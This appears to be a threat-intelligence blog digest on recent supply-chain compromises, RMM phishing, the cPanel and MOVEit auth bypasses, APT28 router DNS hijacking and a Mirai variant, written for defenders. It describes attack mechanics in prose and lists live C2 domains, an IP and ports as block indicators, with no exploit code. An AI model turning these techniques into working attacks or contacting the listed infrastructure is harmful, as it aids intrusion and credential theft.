EvilBit Threat Digest - Supply Chains That Keep on Giving

The past few days read like a greatest-hits album nobody asked for. Active supply-chain compromises, state actors abusing RMM tools at scale, a fresh wave of router hijacks, all in the same narrow window. If it feels like the same song on repeat, that's because the playlist hasn't changed much since the last edition. What's different this week is the pace. Exploitation is faster, and the same campaigns keep landing on Windows and Android together.

RMM Phishing and the Usual Suspects

Securonix tracked a campaign they're calling VENOMOUS#HELPER that has already hit more than 80 organizations, mostly in the US. The lure is a fake US Social Security Administration email asking the victim to verify an address and download a "statement." What gets installed isn't one RMM tool, it's two: a self-hosted SimpleHelp 5.0.1 instance paired with a ConnectWise ScreenConnect relay, giving the operators two independent access channels on every host (The Hacker News writeup has the full chain). Both binaries are vendor-signed, so SmartScreen and signature-based AV stay quiet.

The same TTPs keep working because defenders still treat RMM tools as benign by default. Hunt for unexpected SimpleHelp or ScreenConnect deployments on endpoints that never had them before, and treat any helpdesk_*.zip or Statement_*.exe attachment from an "SSA" sender as hostile. If random RMM tools can phone home from your environment without approval, you're one click away from a foothold that survives most reimages. Ask your AppLocker / WDAC team whether SimpleHelp is on the allow-list by mistake, then revisit your RMM allow-list more broadly.

cPanel and MOVEit: The Auth-Bypass Double Feature

CVE-2026-41940 in cPanel & WHM, and the related WordPress Squared (WP2) product, is getting hammered in the wild. CVSS 9.8. The bug is a CRLF injection in the login and session-loading path that hands an unauthenticated attacker a fully authenticated root admin session in a single request. CISA added it to the Known Exploited Vulnerabilities catalog on May 1 with a federal-agency deadline of May 3 that has already passed. cPanel pushed fixes April 28 across seven supported branches: 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5, and WP Squared 136.1.7. Anything older than that release line is low-hanging fruit, and exploitation has been observed in the wild since late February, so the patch window was effectively a two-month zero-day. Cato's threat brief has the technical writeup.

The same week brought CVE-2026-4670 (auth bypass, CVSS 9.8) and CVE-2026-5174 (improper input validation, CVSS 7.7) in Progress Software's MOVEit Automation. Solo, only -4670 lets an unauthenticated remote attacker in; -5174 is a privilege-escalation issue that needs a foothold first. Chained, they hand over administrative control of MOVEit Automation, including credentials stored in tasks. Fixed versions: 2025.1.5, 2025.0.9, 2024.1.8, and newer (BleepingComputer's coverage has the upgrade procedure, including the unavoidable outage during the full-installer upgrade).

Hunting note: Same shape we keep seeing. Public-facing file-transfer and management products are the first domino, every time. Block external access to management interfaces where you can. For cPanel, check whostmgrsession cookie patterns and any session files on disk that show hasroot=1 for accounts that didn't log in interactively. For MOVEit, treat any unexpected admin-account creation or new task definition as a compromise until proven otherwise. Tenable plugins for both shipped inside 24 hours, so your VM team is already covered, just confirm the policies actually run.

Prioritize these the same way you did the last round of similar flaws.

Russian Router Campaign and Office Token Theft

KrebsOnSecurity reported that APT28 (GRU-linked, also tracked as Forest Blizzard) has been systematically compromising MikroTik and TP-Link SOHO routers to hijack DNS and steal Microsoft Office authentication tokens. At peak in December 2025, the operation had roughly 18,000 routers under its control, most of them end-of-life or far behind on patches. The TP-Link WR841N path leans on CVE-2023-50224 to disclose info, then a follow-up GET rewrites DHCP DNS to attacker-controlled resolvers. From there, lookups for Microsoft login domains get steered to attacker infrastructure that intercepts OAuth flows (NCSC's joint advisory has the full IOC list).

Primary targets per NCSC and the FBI's IC3 PSA were government agencies, including ministries of foreign affairs and law enforcement. That doesn't mean the rest of us get a pass. The tactic is elegant, and any M365-heavy shop with consumer-grade edge gear is in scope. Rotate any Office-related tokens that touched a compromised network segment, retire unsupported MikroTik and TP-Link gear at the perimeter, and watch for unexpected DNS or firmware changes on the edge devices you keep.

The PyPI and NPM Supply-Chain Sideshow

AI developers continue to be a favorite target. A malicious PyTorch Lightning package (lightning versions 2.6.2 and 2.6.3, both published April 30) shipped a hidden _runtime directory that pulled the Bun JavaScript runtime from GitHub at import time and used it to execute an obfuscated, ~11 MB credential stealer (Snyk's analysis walks the chain; BleepingComputer has the wider context). Execution happened on import lightning, no extra step required. Targets included GitHub and npm tokens, SSH keys, cloud and Kubernetes creds, Vault, Docker creds, .env files, and crypto wallets. The malicious versions have been removed from PyPI; the latest safe release is 2.6.1. Anything that ran 2.6.2 or 2.6.3, treat as compromised: rotate everything that touched the build runner and scan for stealer artifacts.

On the Node.js side, PhantomRaven Wave 5 (Mend.io's research) dropped 33 malicious NPM packages aimed at DeFi, cloud, and AI developers. The packages use a three-stage Remote Dynamic Dependency loader that phones home to live C2, then exfiltrates developer identity, email, CI/CD tokens, GitHub repo names, and public IPs. As of Mend's writeup, all 33 packages were still live on NPM and the C2 was still answering, so this is not a clean-up-after retrospective, it's a hunt-now problem. The usual advice still applies: npm install --ignore-scripts, audit for external HTTP dependencies, block the published C2 indicators, and treat any package that pulls a runtime at install or import time as hostile by default.

New North Korean Supply-Chain Play

ESET detailed a fresh ScarCruft (APT37) operation that compromised the sqgame.net gaming platform, popular with ethnic Koreans in China's Yanbian prefecture. The attackers trojanized the Windows client and at least two Android games (延边红十 / Yanbian Red Ten and 新画图 / New Drawing), dropping RokRAT on Windows, which then pulled down the BirdCall backdoor. The Android version of BirdCall vacuums up contacts, SMS, call logs, documents, media, private keys, screenshots, and ambient audio. The goal is the usual ScarCruft program: surveil a specific diaspora.

If you're pulling software from a niche or community platform, the platform is your supply chain. These binaries passed casual integrity checks for that reason. App-store and signed update channels exist for a reason; sideloading from a community site burns whatever assurance you had left.

DAEMON Tools Installers Still Bleeding

Kaspersky's Securelist published details on a supply-chain compromise in which official DAEMON Tools Lite installers, versions 12.5.0.2421 through 12.5.0.2434, have been trojanized since at least April 8. The signed binaries (specifically DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe) beacon to a typosquatted domain, profile the victim, then drop an info stealer, backdoor, and a QUIC-based RAT on a small subset of high-value targets. The C2 stack supports HTTP, UDP, TCP, WSS, QUIC, DNS, and HTTP/3, with payloads injected into notepad.exe and conhost.exe. Roughly 10% of infections landed on org-managed hosts; the rest were home users across about a hundred countries.

Block the listed C2 infrastructure (env-check.daemontools.cc, 38.180.107.76) and treat any DAEMON Tools install from that date range as suspicious until proven clean. Code-signing trust is doing a lot of work here that it shouldn't have to do alone.

Other items I'm tracking

• The San Diego Community College District is still recovering from a confirmed cyberattack that knocked out internet, email, websites, and registration systems for a district that serves roughly 90,000+ students. No data loss reported yet, but the timing during the spring-semester home stretch is painful.
• A new Mirai variant, xlabs_v1 (operator handle Tadashi), is hijacking ADB-exposed Android and IoT devices on TCP/5555 for DDoS-for-hire attacks aimed at Minecraft and other game servers. C2 is at xlabslover.lol:35342, with a fallback listener on TCP/26721. Hunt.io's research notes 4M+ hosts globally still expose ADB. Disable it, it is 2026 and this joke should have ended years ago.
• Cisco open-sourced a Model Provenance Kit for fingerprinting AI models. Useful if you're ingesting anything from Hugging Face and want to know if it changed between download and deployment.
• Another insider-risk story to pair with last edition's BlackCat sentencing: a former ransomware-negotiator-turned-Karakurt-affiliate drew 8.5 years. Privileged accounts touching IR engagements deserve the same SoD scrutiny as any other admin role.
• Cisco Talos profiled UAT-8302, a previously-undocumented actor with a broad malware portfolio worth running through your detection-engineering backlog.
• CIO published a longer piece on the DPRK fake-IT-worker problem. HR + IT controls (camera-on interviews, geo-anchored access, hardware shipped only to verified addresses) keep showing up as the cheapest mitigations.
• Foxconn's Wisconsin plant outage is still raising cyber questions. Worth tracking if your supply chain runs through US-based manufacturing.

The pattern this week is trust. Package registries, RMM tools, that router nobody remembered owning. Every layer that "just works" without oversight becomes another vector.

If nothing else, treat this week as a reminder to revisit your software bill of materials and your RMM allow-list. The attackers certainly have.

Trust the weave you built, not the one you inherited.

~ UncleSp1d3r